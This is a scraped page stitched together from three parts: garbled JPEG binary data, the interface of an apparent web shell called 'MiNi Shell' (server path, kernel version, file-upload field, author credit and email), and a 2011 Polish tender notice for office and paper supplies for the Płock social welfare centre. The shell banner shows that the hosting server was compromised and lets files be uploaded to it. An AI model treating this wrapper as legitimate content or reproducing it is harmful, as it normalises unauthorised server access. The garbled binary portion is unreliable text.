JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110119/8274-N-2011.html

<p class="kh_header"><b>Płock: Dostawa materiałów biurowych i papierniczych dla Miejskiego Ośrodka Pomocy Społecznej w Płocku</b><br>
<b>Numer ogłoszenia: 8274 - 2011; data zamieszczenia: 19.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Wolskiego 4, 09-400 Płock, woj. mazowieckie, tel. 024 3640210, 364 02 22, faks 024 364 02 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopspl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papierniczych dla Miejskiego Ośrodka Pomocy Społecznej w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Bloczki samoprzylepne 50x40 żółta 1x100 op 250
2. Bloki do Flipchartów Format A1 z otworami do zawieszenia gładki 1 sztuka = 50 kartek szt 10
3. Bloczki samoprzylepne 76x76 kolor żółty 	szt	400
4. Koperta biała samoklejąca B5 (500 sztuk w opakowaniu) op	30
5. Koperta biała samoklejąca C4 (250 sztuk w opakowaniu) op 20
6. Koperta samoklejąca C6 (1000 sztuk w opakowaniu)op 50
7. Koperta z okienkiem samoprzylepna 110x220x mm DLNK,okno prawe (1000 sztuk w opakowaniu) 	op	55
8. Koperta E4 z rozszerzanymi bokami RBD, samoklejące z paskiem silikonowym koloru brązowego (opakowanie 250 sztuk)	op	5
9.Segregator A4 z mechanizmem, oklejany na zewnątrz poliolefiną, wewnątrz papierem; dwustronna, wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia, różne kolory, szerokość grzbietu 35 mm 	szt	20
10.Papier komputerowy trzywarstwowy, samoklejący kolorowy (opakowanie) 240x3x12	op	40 op
11.Papier komputerowy czterowarstwowy, samoklejący kolorowy (opakowanie) 240x4x12	op	30 op
12.Papier ksero A4/80g biały 1 - ryza = 500 arkuszy 	ryza	2200
13.Papier ksero A3 - 250 g biały1 - ryza = 250 arkuszy	ryza	5
14.Papier ksero A4/160 g biały 1 ryza = 250 arkuszy 	ryza	40
15.Papier toaletowy typu Mola Eko biały (1 rolka)	rolka	2600
16.Papier toaletowy rola o średnicy 23 cm średnicy tulej 6 cm długość nie mniej niż 350 cm	rolka	1600
17.Papier wizytówkowy format A4 rożne kolory (20 arkuszy w opakowaniu )	op	20
18.Pudła archiwizacyjne z miejscem do opisu na grzbietach i bocznej ścianie szerokość grzbietu 105mm Wieko zawiera dodatkowe zapięcie zabezpieczające przed przypadkowym otwarciem .Pudła archiwizacyjne o wymiarach 325x105x260 mm 	szt	300
19.Przegródki do akt osobowych - 1 opakowanie = przegródki A,B,C op10
20.Pojedyncze ręczniki papierowe gofrowane, składane w Z, wymiary 25x23 cm, (1paczka=250 listków) 	paczek	4000
21.Ręczniki jednorazowe papierowe (typu AHA) 1 opakowanie=2 sztuki w opakowaniu	op	160
22.Rolka do maszyn liczących 57mm biała	szt	250
23.Segregator A4 z mechanizmem, oklejany na zewnątrz poliolefiną, wewnątrz papierem; dwustronna, wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia, różne kolory, szerokość grzbietu 75 mm	szt	600
24.Segregator A4 z mechanizmem, oklejany na zewnątrz poliolefiną, wewnątrz papierem; dwustronna, wymienna etykieta na grzbiecie, na dolnych krawędziach metalowe okucia, różne kolory, szerokość grzbietu 50 mm 	szt	40
25. Teczka wiązana papier biała	szt	300
26.Teczka na gumkę lakierowana A4	szt	50
27.Teczka zawieszka A4 ekologiczna	szt	20
28.Koperta bezpieczna format o wymiarach 175x255	szt	800
29.Blok rysunkowy A4	szt	160
30.Blok techniczny biały A4	szt	48
31.Blok techniczny kolorowy A4	szt	160
32.Blok techniczny kolorowy A3	szt	80
33.Brystol biały - arkusz A0	szt	32
34.Brystol kolorowy - arkusz A0 różne kolory 	szt	48
35.Blok rysunkowy A3 biały 	szt	80
36.Blok rysunkowy A3 kolorowymi kartkami 	szt	80
37.Papier Kolorowy A5 zeszyt	szt	80
38.Papier samoprzylepny kolorowy Zeszyt A5	szt	80
39.Blok z makulatury A4/50 stron kratka	szt	400
40.Blok z makulatury A5/50 stron kratka	szt	200
41.Cienkopis z końcówką metalową, grubość linii 0,4 (+/-0,01) mm, skuwka chroniąca przed wysychaniem, (kolor tuszu niebieski czerwony czarny)szt200
42.Długopis automatyczny, obudowa z mocnego plastiku, elementy mechaniczne metalowe, wkład piszący (niebieski i czarny) o długości linii pisania powyżej 10000m,	szt	400
43.Wkład pasujący do długopisu z poz. 42 (kolor niebieski i czarny)	szt1000
44.Długopis żelowy, tusz wodoodporny nie blaknący, przezroczysta obudowa, gumowy uchwyt, długość pisania linii 600m (kolor tuszu niebieski czerwony czarny)	szt. 	160
45.Wkład pasujący do długopisu z poz. 44 (kolor tuszu
niebieski czerwony czarny)	szt	200
46.Dziurkacz metalowy z ogranicznikiem - umożliwiającym przedziurkowanie do 60 kartek	szt	20
47.Gumka do ścierania - miękka, dwukolorowa, część niebieska (ok.1/3 ) służy do ścierania atramentu, długopisu oraz pisma maszynowego, część biała (ok.2/3) służy do ścierania ołówków, nie niszczy ścieranej powierzchni, wymiary: 43 x 19x 13 mm (+/- 5 mm).	szt	200
48.Klej w sztyfcie - bezbarwny, bezwonny, nietoksyczny, niebrudzący, zmywalny, posiada atest PZH, do klejenia papieru, tektury, posiada min. dwuletni okres stosowania bez utraty właściwości, waga min. 35g. 	szt160
49.Klip do papieru metalowy - 51 mm op. 12 szt.	op	10 szt
50.Kalendarz pokładowy A2/52k format 41,5 x 56,5 z listwą ochroną na rok 2012 	szt	20
51.Kalendarz na biurko wszyty do składanej podstawi tekturowej na rok 2012 typu Merkury 	szt	220
52.Kalendarz książkowy na rok 2012 format A4 układ dzienny oprawie imitującej skórę bloki szyte nićmi 	szt	2
53.Kalendarz książkowy na rok 2012 format A5 układ dzienny oprawie imitującej skórę bloki szyte nićmi 	szt	30
54.Korektor w płynie z pędzelkiem, pojemność 20ml	szt	160
55.Korektor w taśmie w kształcie myszki, z taśmą o bardzo dobrych właściwościach kryjących o wym. 5mmx8,5mm	szt	20
56.Koszulka na dokumenty A4 (100szt. w opakowaniu), wykonane z krystalicznej folii PP o grubości min. 55 mic., z bocznym wzmocnieniem zapobiegającym rozerwaniu perforacji, antystatyczna otwierane od góry	op	160
57.Koszulka na dokumenty o wymiarach 220x300 wykonane z krystalicznej folii PP o grubości min. 55 mic.120 pojemna do 60 kartek o gramaturze 90g (25 sztuk w opakowaniu)	op 	50
58.Marker pernamentny z okrągłą końcówką wodoodporny do pisania po różnych powierzchniach Długość linii pisania 1400 m Grubość lini pisania 1/7 mm	szt	100
59.Nożyczki 21 cm 	szt	20
60.Skoroszyt oczkowy ? okładki wykonane z kartonu co najmniej 250g/m (50 sztuk w opakowaniu)	op.	100
61.Skoroszyt oczkowy biały okładki wykonane z kartonu co najmniej 250g/m (50 sztuk w opakowaniu)	op.	80
62.Skoroszyt papierowy zwykły z wąsami wykonane z kartonu co najmniej 250g/m (50 sztuk w opakowaniu)	op.	250
63.Skoroszyt PCV A4 zawieszka 1 opakowanie =10 sztuk 	op	50
64.Skorowidz A4 w kratkę /96 kartek twarda oprawa	szt	20
65.Skorowidz A4 w kratkę /1 96 kartek twarda oprawa	szt	10
66.Skorowidz ? A4 w kratkę /96 kartek twarda oprawa	szt	10
67.Spinacz duży 50 mm (100 sztuk w opakowaniu) 	op	100
68.Spinacz mały okrągły 28 mm (100 sztuk w opakowaniu) op  300
69.Tablica korkowa 80x60	szt	10
70.Taśma klejąca przezroczysta 18x20	szt	160
71.Taśma pakowa brązowa samoprzylepna	szt	10
72.Tusz do stempli czerwony pojemność minimum 22 ml	szt	30
73.Tusz do stempli czarny pojemność minimum 22 ml	szt	4
74.Ołówek z gumką -wykonany z żywicy syntetycznej, trwały ,niełamliwy grafit, twardość grafitu HB, dobrze się ostrzy, w razie złamania nie pozostawia drzazg. 	szt	200
75.Temperówka metalowa, jednootworowa	szt	20
76.Zakreślacz - fluorescencyjny tusz na bazie wody, końcówka ścięta, szerokość linii 2-5 mm do pisania po wszystkich rodzajach papieru różne kolory 	szt	160 szt
77.Zeszyt A4 w kratkę w twardej oprawie 96 kartek 	szt	160
78.Zeszyt A5 w kratkę miękka okładka 96 kartek 	szt	200
79.Zeszyt A4 w kratkę w twardej oprawie 200 kartek 	szt	60
80.Zeszyt A5 w kratkę miękka okładka 32 kartki	szt	20
81.Zszywki 24/6 (1000 sztuk w opakowaniu)	op	250
82.Zszywki 23/10	op	10
83.Zszywki 10/6	op	10
84.Zszywki 23/15	op	10
85.Wkład typu zenit metalowa obudowa (kolor tuszu niebieski czarny)szt 300
86.Zszywacz metalowy 24/6 (do 30 kartek)	szt	20
87.Bibuła marszczona kolorowa 50x200cm ( kolor czerwona, zielona, różowa, fioletowa, granatowa, żółta, biała	szt	160
88.Bibuła gładka, witrażowa A4 (12 w opakowaniu kolorów) op 40 op.
89.Długopis typu Corvina ( kolor niebieski czarny, czerwony, zielony)szt160
90.Farby plakatowe typu Astra w tubach (12 kolorów w opakowaniu)op 32
91.Farby plakatowe typu Astra (12 kolorów w opakowaniu)	op 32
92.Flamastry (12 kolorów w opakowaniu)	op	48
93.Kredki typu Bambino (12 kolorów w opakowaniu)	op	80
94.Kredki woskowe (12 kolorów w opakowaniu)	op	40
95.Klej typu wikol 	szt	40
96.Klej brokatowy ( w opakowaniu 5 kolorów)	szt	16
97.Klej w tubie biurowy 50 cmp	szt	80
98.Kredki ołówkowe (12 kolorów w opakowaniu)	op	80
99.Korektor w pędzelku 20 ml	szt	24
100.Linijka 30 cm	szt	32
101.Marker czarny ze ściętą końcówką BIC	szt	16
102.Modelina typu Astra (6 kolorów w opakowaniu)	op	8
103.Nożyczki 15 cm kolor czarny 	szt	40
104.Ołówek bez gumki 	szt	160
105.Pastele suche (12 kolorów w opakowaniu) 	op	16
106.Pastele olejne (12 kolorów w opakowaniu) 	op	16
107.Pędzle cienkie	szt	16
108.Pędzle średnie	szt	16
109.Pędzle Grube	szt	16
110.Plastelina typu Astra (10 kolorów w opakowaniu)	szt	16
111.Taśma klejąca dwustronna	szt	16
112.Tektura falista różnokolorowa 	op	16
113.Zeszyt w kratkę A5 96-kartkowy, miękka okładka	szt	40
114.Zeszyt w kratkę 32 kartkowy, miękka okładka	szt	160
115.Zeszyt w kratkę 16 kartkowy, miękka okładka	szt	80
116.Zeszyt w 3-linie 16 kartkowy, miękka okładka	szt	80
117.Zeszyt w linie 16 kartkowy, miękka okładka	szt	40
118.Zeszyt gładki 16-kartkowy, miękka okładka	szt	40
119.Marker permanentny z ściętą końcówką wodoodporny do pisania po różnych powierzchniach Długość linii pisania 1400 m Grubość linii pisania 1/7 mm	szt	24
120.Okładki na dyplomy w twardej oprawie format A4 kolor granatowy szt 20
121.Taśma maszynowa 13mmx6 czerwono-czarna pasująca do maszyny liczącej Canon mp 1211	szt	5
122.Wałeczek barwiący czerwono-czarny do maszyny liczącej Vector LP-203TS	szt	10
123.Grzbiety do bindownicy - kolorowe; średnica grzbietu 8 mm 100 sztuk w opakowaniu 	op	1
124.Grzbiety do bindownicy - kolorowe; średnica grzbietu 16 mm 100 sztuk w opakowaniu 	op	1
125.Okładki do bindowania przezroczyste, wykonane z twardej wysoko przejrzystej folii PCV o grubości 0,2 mm, w opakowaniu 100 szt.op	2
126.Okładki do bindowania kartonowe kolor czarny format A4 w opakowaniu 100 szt 	op	2
127.Mechanizm skoroszytowy 25 sztuk w opakowaniu 	op	10
128.Folia laminacyjna błyszcząca, zaokrąglane rogi o wymiarach 80x111; micron:250(2x125) 1 opakowanie = 100 sztuk) 	op	20.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada doświadczenie zawodowe niezbędne do wykonania zamówienia tj.: zrealizował w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 dostawę (1 dostawa rozumiana jest jako 1 zrealizowana umowa) materiałów biurowych i papierniczych o wartości nie niższej niż 60 000 zł. brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz oferty - Załącznik Nr 1 do SIWZ.
2. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów (należy jednak załączyć dokumenty, z których wynikać będzie ciągłość i prawidłowość udzielonych pełnomocnictw - odpisy z właściwego rejestru). Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.
3. Wypełniony i podpisany Formularz cenowy - Załącznik Nr 4 do SIWZ.
4. Informacje dotyczące podwykonawców - Załącznik nr 5 do SIWZ. Jeżeli Wykonawca nie przewiduje zatrudnienia podwykonawców wpisuje nie dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poza niżej wymienionymi:
1) wynagrodzenia w przypadku ustawowej zmiany wysokości podatku VAT,
2) terminu realizacji przedmiotu umowy w przypadku wystąpienia poniższych okoliczności:
a) zaistnienie działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych które mogą być spowodowane użyciem ich przez wykonawcę,
b) zaistnienie klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, niekorzystne warunki pogodowe w postaci np. ulewnych deszczy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopspl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej 09-400 Płock, ul. Wolskiego 4 pol. 202 IIp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej 09-400 Płock, ul. Wolskiego 4 pok. 205  IIp sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com